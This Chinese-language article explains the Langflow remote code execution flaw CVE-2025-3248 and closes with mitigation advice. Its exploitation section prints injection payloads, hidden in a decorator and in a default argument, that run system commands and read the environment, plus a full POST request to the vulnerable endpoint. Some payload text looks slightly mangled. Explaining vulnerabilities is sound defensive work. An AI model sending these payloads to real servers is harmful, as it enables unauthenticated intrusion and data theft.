章
目
录
最近,网络安全领域发现了一个大问题,在Langflow这个开源平台里,出现了一个严重的远程代码执行(RCE)漏洞,编号为CVE-2025-3248。可能有些小伙伴不太清楚Langflow是什么,它是一个很常用的开源平台,主要用来以可视化的方式搭建由人工智能驱动的智能体和工作流程,简单来说,就是能让大家更方便地用AI做各种事情。
但这次这个漏洞可不得了,它的通用漏洞评分系统(CVSS)评分为9.8,属于严重级别,影响的是1.3.0版本之前的所有Langflow版本。而且,攻击者不用验证身份,就能在存在这个漏洞的服务器上执行任意命令,这就像给了坏人一把能随意进出你家的钥匙,服务器里的敏感数据和系统安全都面临着巨大的危险。
一、漏洞的攻击点与成因
这个漏洞主要出在Langflow的/api/v1/validate/code这个端点上。在这个端点,它会调用Python的内置函数exec()来处理用户提供的代码,可问题就出在这,它既没有进行合适的身份验证检查,也没有沙盒保护机制,这就给了恶意攻击者可乘之机。
那这个漏洞是怎么来的呢?Zscaler的研究人员发现,这和Python处理函数定义时的特性有关。在Python里,处理函数定义的时候,装饰器和默认参数值会马上被求值。打个比方,就好像你写了个规则,这个规则里有些条件一看到就会马上执行,而不是等整个规则都检查完再执行。这样一来,要是有人在这些结构里藏了恶意代码,在抽象语法树(AST)处理阶段,这些恶意代码就能趁机执行了。
二、漏洞的利用方式
攻击者利用这个漏洞的方式还挺“巧妙”的,主要有两种方法来注入恶意负载。
(一)利用函数装饰器
第一种方法是把命令藏在函数装饰器里。在代码处理的时候,这些装饰器会马上执行。比如说下面这段代码:
# 这里攻击者将恶意命令嵌入装饰器中,@exec(“import os; os.system(‘id > /tmp/pwned’)”) 这部分会在处理时立即执行
# 它的作用是执行系统命令,将当前用户信息写入/tmp/pwned文件
@exec("import os; os.system('id > /tmp/pwned')")
def foo():
pass
(二)利用默认参数值
第二种方法是利用函数定义里的默认参数值。在抽象语法树(AST)处理阶段,这些默认参数值也会被求值。看下面这段代码:
# 这里攻击者在函数默认参数中嵌入恶意代码,exec(“import(‘subprocess’).check_output([‘env’])”) 会在处理时执行
# 它的目的是获取系统环境信息,可能被攻击者用来窃取数据
def foo(cmd=exec("import('subprocess').check_output(['env'])")):
pass
当攻击者把这些带有恶意负载的代码,通过POST请求发送到存在漏洞的端点时,攻击就开始了。像下面这样的请求:
POST /api/v1/validate/code HTTP/1.1
Host: vuln-test-langflow.example.com
Content-Type: application/json
Content-Length: 172
{
"code": "@exec(“with open(‘hacked.txt’, ‘w’) as f: f.write(‘The server has been compromised’)”)\ndef foo():\n pass"
}
这个时候,服务器虽然可能看起来没啥异常,正常响应了请求,但恶意代码已经在后台偷偷执行了,很可能会创建后门,或者把服务器里的数据偷走。
三、应对措施与建议
因为这个漏洞太容易被利用,而且也很容易被攻击者访问到,所以安全专家强烈建议,正在使用Langflow的企业赶紧行动起来,升级到1.3.0或更高版本,在这个版本里,对存在漏洞的端点进行了身份验证要求,能在一定程度上避免这种攻击。
除了升级,企业还可以采取一些其他措施来降低风险。比如说进行网络分段,就像是把一个大的网络区域划分成一个个小的区域,这样即使某个区域出了问题,也不会轻易影响到其他区域;通过零信任架构来限制访问,不管是内部还是外部的访问请求,都要经过严格的验证,不能轻易相信;再部署监控解决方案,随时盯着系统的运行情况,一旦发现异常就能及时处理。
总的来说,这次Langflow的漏洞给大家提了个醒,在使用开源平台搭建AI工作流的时候,一定要多关注安全问题,及时更新版本,做好防护措施,别让坏人钻了空子。
